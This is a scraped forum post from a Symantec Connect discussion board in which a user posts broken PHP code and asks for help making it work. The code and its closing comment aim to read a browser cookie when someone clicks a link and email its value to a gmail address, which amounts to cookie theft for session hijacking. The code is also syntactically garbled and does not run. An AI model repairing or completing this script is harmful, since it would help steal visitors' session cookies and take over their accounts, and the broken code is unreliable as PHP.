Quantcast
Channel: Symantec Connect - Products - Diskussionen
Viewing all articles
Browse latest Browse all 243

need help, php code error

$
0
0
Ja, ich suche eine Lösung

<?php
if
($cookie_name)  (isset ($_COOKIE))
(isset ($_COOKIE[$cookie_name]))
 
{$to="ex2@gmail.com";
$subject="chessus lives";
$message= "$cookie_name,  $_COOKIE [$cookie_name] " ;
$from="ex@gmail.com";
mail ($to,$scubject, $message [$from]);
}
 ?>

\*not working properly, want to retrieve cookie value,from web browser click on link and send it as e-mail*/


Viewing all articles
Browse latest Browse all 243

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>